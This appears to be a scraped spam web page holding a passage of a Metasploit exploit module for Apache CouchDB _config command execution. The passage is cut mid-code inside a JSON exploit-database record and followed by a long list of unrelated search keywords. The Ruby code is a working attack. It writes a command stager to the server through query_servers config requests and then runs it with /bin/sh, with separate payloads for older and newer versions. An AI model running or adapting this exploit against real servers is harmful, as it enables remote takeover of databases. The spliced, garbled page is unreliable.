Apache CouchDB _config Command Executionmauritania pronunciation sound
(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))\n payload2\n elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')\n fail_with(Failure::NotVulnerable, \"#{peer} - The target is not vulnerable.\")\n end\n end\n\n # Exploit with multi requests\n # payload1 is for the version of couchdb below 1.7.0\n def payload1\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\n rand_hex = Rex::Text.rand_text_hex(32)\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\n\n register_file_for_cleanup(rand_file)\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd1}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\n 'method' => 'PUT',\n 'authorization' => @auth\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %({\"_id\": \"#{rand_hex}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\n 'method' => 'POST',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"language\":\"#{rand_cmd1}\",\"map\":\"\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_config/query_servers/#{rand_cmd2}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"/bin/sh #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_temp_view?limit=20\"),\n 'method' => 'POST',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"language\":\"#{rand_cmd2}\",\"map\":\"\"})\n )\n end\n\n # payload2 is for the version of couchdb below 2.1.1\n def payload2\n rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)\n rand_db = Rex::Text.rand_text_alpha_lower(4..12)\n rand_doc = Rex::Text.rand_text_alpha_lower(4..12)\n rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)\n rand_hex = Rex::Text.rand_text_hex(32)\n rand_file = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}\"\n\n register_file_for_cleanup(rand_file)\n\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_membership\"),\n 'method' => 'GET',\n 'authorization' => @auth\n )\n\n node = res.get_json_document['all_nodes'][0]\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd1}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"echo '#{@cmdstager}' > #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}\"),\n 'method' => 'PUT',\n 'authorization' => @auth\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/#{rand_doc}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %({\"_id\": \"#{rand_hex}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd1}\"})\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/_node/#{node}/_config/query_servers/#{rand_cmd2}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'data' => %(\"/bin/sh #{rand_file}\")\n )\n\n send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, \"/#{rand_db}/_design/#{rand_tmp}\"),\n 'method' => 'PUT',\n 'authorization' => @auth,\n 'ctype' => 'application/json',\n 'data' => %({\"_id\":\"_design/#{rand_tmp}\",\"views\":{\"#{rand_db}\":{\"map\":\"\"} },\"language\":\"#{rand_cmd2}\"})\n )\n end\n\n def cmdstager_path\n @cmdstager_path ||=\n \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}\"\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T16:33:32", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/HTTP/APACHE_COUCHDB_CMD_EXEC", "hash": "84e7a5320e2af88ecf60aab5e94c029f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Apache CouchDB Arbitrary Command Execution", "description": "CouchDB administrative users can configure the database server via HTTP(S).
Kohler Levelling Machines, La Superbe Meaning, Atlanta Dream Arena, Huss Rock Salmon, Susan Ward Instagram, Alex Azar Salary, Oldham County School, Away Film 2019, Skyspace Los Angeles, Youtube Stocks Today, Tallest Building In Monaco, Images Of Sunfish, Intel Xeon E3 Price, Cineplex Outtakes Menu Prices, La Casina Dunsborough Menu, Reddit Westworld Season 3 Episode 2 Discussion, Toby Flenderson Memes, Cafe Jobs Luxembourg, Adelphi Wharf Flats To Rent, Polk High Letterman Jacket, Hunted 2020 Mervyn, Youtube London In The 1950s, How Did The Rudd Fish Get To North America, Defiance Season 2 Episode 1, National Gallery Of Art Shop Online, Thermaltake View 71 Argb Controller, Twilio Hatch Interview Questions, The Road To Jonestown Pdf, Jordan Loyd Toronto, Madison Lake Chain, Junior Rugby Age Groups Uk, Brazilian Passport Photo Size, Piano Hungarian Rhapsody No 6, Districts In Southern Uganda, Breaking From Above, Titan Travel Accounts Payable, Laura Tremaine Podcast, Crown Perth Accommodation, Northampton Saints Academy Players, Japanese Tea Accessories, Fall Walleye Fishing St Clair River, Cesar Legaspi Life Story, Garwoods Fireworks 2019, Hath Definition Shakespeare, One California Plaza Tenants, Hempstead High School, Ted Chaough Reddit, Liechtenstein Bank Holidays 2020, Where Does Cynthia Mcfadden Live, Chuck Aspegren Movies, Red Lion Mcminnville Oregon, Sinhala News Web, Cooking Small Bluegill, Zodiac Signs As Characters, Gabrielle Reece Olympics, How To Use The Airbnb App, Roddy Woomble - The Deluder, Atlantic Books Authors, Larry Clark Print, Christianity In Rwanda, Rockin' Thru The Rockies, Porky In Wackyland, Hyatt Malta Hotel, Black Buffalo Blood Orange, Alapati Leiua Samoa, Little Red River Boat Rental, Nike Supernova 2020 Release Date, Saints Season Ticket Prices, Gntx Stock Forecast, Caresource Careers Cincinnati Ohio, Felix Solis Movies And Tv Shows, Telus Theme Packs 2020, Aerion Targaryen Game Of Thrones, Mo Murda Come Again, Actian Vs Snowflake, Radcliffe, Manchester Postcode, Seinfeld George Reddit, Epson Fastfoto Ff-680w Office Depot, Weather Forecast Terms, Null And Alternative Hypothesis Statistics, The Paramount New Orleans, R Nintendo Switch, Alameda Slim Disney Wiki, Jay Johnstone Mr Show, Paramo Velez Adventure Light Smock, What Is Calico Fabric Used For, Roger Sterling Sr, Philadelphia Energy Solutions Refinery Location, How Did Charles Tupper Die, Ajnabi Tum Jane Pehchane Se Lyrics, Jeff Perry Net Worth, ,Sitemap
Apache CouchDB _config Command Execution
Want to join the discussion?Feel free to contribute!